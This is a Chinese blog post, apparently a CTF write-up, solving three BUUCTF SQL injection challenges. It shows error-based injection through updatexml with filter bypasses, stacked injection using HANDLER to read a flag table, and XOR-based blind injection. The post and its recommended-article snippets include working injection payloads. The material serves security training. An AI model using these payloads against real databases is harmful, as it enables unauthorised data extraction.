buuctf-sql部分类型题目

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量91 收藏 1
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75327657/article/details/131811251
版权

1.报错注入([极客大挑战 2019]HardSQL 1)

先尝试用万能密码发现不行

那就试试1’看看是什么情况

 从他给我的信息’‘1'''可以看出是单引号闭合引用

再次尝试 

发现有东西被过滤了大概就是空格被过滤了那就利用()绕过试试

发现可行的

 

经过各种尝试发现updatexml和extractvalue两个关键词没有被过滤

之后就开始构建数据库查询语句 

1'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

0x7e是~的16进制写法以此类推

表名

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

用户信息

1'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#

他给了一半的flag那还需要右边一半

再次构建右半

1'or(updatexml(1,concat(0x7e,(select(right(password,21))from(H4rDsq1)),0x7e),1))# 

over 

2.堆叠注入([GYCTF2020]Blacklist)

首先随便输入1看看回显

说明有两个字段大概可能就是id和内容

 

 用一下万能密码

但是看这个没有看出来有flag的存在那就看看全部表

 

看到flag了

1';show columns from FlagHere #
查看flag内的字段信息

 

根据以下的知识

  1. 可以用handler 【表名】 open来打开某个表
  2. 然后就可以在里面用handler 【表名】 read 【获取第几行】来获取该数据库里面的数据了
  3. 最后再利用handler【表名】 close来关闭(具体可以查看这里:【MySQL】MySQL 之 handler 的详细使用及说明_mysql中handler_边扯边淡的博客-CSDN博客

 1';
handler FlagHere open;
handler FlagHere read first;
handler FlagHere close;

构造出payload

over

3.盲注([CISCN2019 华北赛区 Day2 Web1]Hack World) 

根据题目给出的提示、

同样试试万能密码这一些还是没有用

通过bp抓包去找哪些没有被过滤

发现就^没有被过滤^符号又涉及到了异或绕过

利用这个构建payload

0^(if((ascii(substr((select(flag)from(flag)),0,1))<60),1,0))


 

 

 利用工具写的二分法脚本

 

得到flag

狼丿王
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF web 随便注 sql注入 mysql预处理语句
m0_46412682的博客
08-01 389
BUUCTF web 随便注 sql注入 mysql预处理语句 开始的页面 查询1 按照手工检测sql注入点步骤 1、判断注入点 1' or 1=1# 1' or 1=2# 两次结果不一样,说明存在sql注入 2、判断有多少字段 1' order by 3#返回错误 1' order by 2#正常,说明有2个字段 3、查询数据库 -1' union select 1,database()# 这里过滤了很多关键字,不能用select,update之类的关键字, 4、堆叠注入 在sql中,分号;是用来
BUUCTFSQL注入做知识点总结
qq_49833809的博客
11-13 732
SQL知识点
BUUCTF关于sql注入的题目
2302_80935968的博客
04-19 761
测试的时候输入了 1’ and ‘1’='1这个有问的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
BUUCTF—极客大挑战sql注入
qq_45927819的博客
07-22 857
文章目录hard sql1、爆数据库2、爆表名3、爆列名4、爆值 hard sql 先fuzz测试一下 空格,union,and,=,/**/,+,等等都被过滤了 显然联合查询注入不能用了,报错注入的函数没被过滤,我们试一下 1、爆数据库 空格我们用()包裹 'or(extractvalue(1,concat(0x7e,database(),0x7e)))# 2、爆表名 = 我们用like绕过 'or(extractvalue(1,concat(0x7e,(select(table_name)from
BUUCTF web SQL注入篇
m0_55854679的博客
08-09 2778
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
BUUCTF SQL注入-1
2303_79340715的博客
01-27 791
最近学了一手SQL注入,就找了个题目练练手写的比较长,我觉得认真看完挺有用的SQL注入就是一步一步来的,当然SQLMAP应该是能直接出来的,但是我觉得新手和我一样的还是可以试试手工注入的,更有成就感哈哈哈哈。
数据库实战案例 - SQL server 实战题目汇总.rar
最新发布
05-20
数据库实战案例 - SQL server 实战题目汇总 数据库实战案例 - SQL server 实战题目汇总 数据库实战案例 - SQL server 实战题目汇总 查找最晚入职员工的所有信息 查找入职员工时间排名倒数第三的员工所有信息 查找...
Hive-SQL中级题目
09-08
这是40到Hive-SQL的练习题目,其中包含了所需要的表数据和答案
KingbaseES-SQL语言参考手册.pdf
02-28
SQL的发展经历了多个阶段,从最初的SQL-1974到后来的SQL-1986、SQL-1992等,不断演进以满足更复杂的数据处理需求。SQL的工作原理基于查询、更新、插入和删除等基本操作,使得用户能够对数据库进行创建、查询、修改和...
T-SQL 语法参考手册.docx
12-11
5. 数据类型:理解数据类型是使用任何编程语言的基础,T-SQL提供了一系列的数据类型来适应不同类型的值,如整数、浮点数、字符串、日期时间等。 - 数据类型类别:分为主要类型,如数值、字符串、日期时间等。 - ...
mysql面试-mysql经典面试题目-数据库的基本概念-SQL语法-事务处理-索引优化-性能调优-mysql-面试题目
01-20
列举一些常见的SQL命令。 什么是索引?为什么使用索引可以提高查询性能? 什么是事务?MySQL如何支持事务处理? 什么是主键和外键?它们之间有什么区别? 什么是数据库范式?列举一些常见的数据库范式。 什么是...
buuctf5(sql注入篇)
weixin_63231007的博客
05-10 3982
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTF-SQL注入
weixin_44770698的博客
06-16 5011
CTF-SQL注入题目整理
BUUCTF&&SQL注入(部分
huohaowen的博客
01-30 1290
今天不被靶场打,被ctf虐😓😓😓
BUUCTF 杂项 [sqltest]
qi_SJQ_的博客
11-12 1271
1.打开题目可以知道这是一道考察流量分析和sql盲注的。 2.本有两个思路,一个是导出http流,
buuctf-misc-sqltest
weixin_46079186的博客
07-28 831
下载题目,wireshark 分析,过滤http包,发现都是sql注入的 我们直接导出http 包,这样方便看一些 这里开始就是他在爆flag 的时候 红圈在试第一个字符,等一下试了个100,返回字节848,这个是小了,因为他后面在加大。后面200 发现大了,直到试到101 返回848 发现还是小。这时候他试了个102,返回了个780 所以第一个字符是102,102对应的ascii码是f 然后就是第二个一直这样推下去,第二个是108 ascii 码对应 l flag{47edb8..
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4647
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
web buuctf [极客大挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1942
做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
buuctf[极客大挑战 2019]BabySQL--联合注入、双写过滤
weixin_61060664的博客
01-10 1481
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值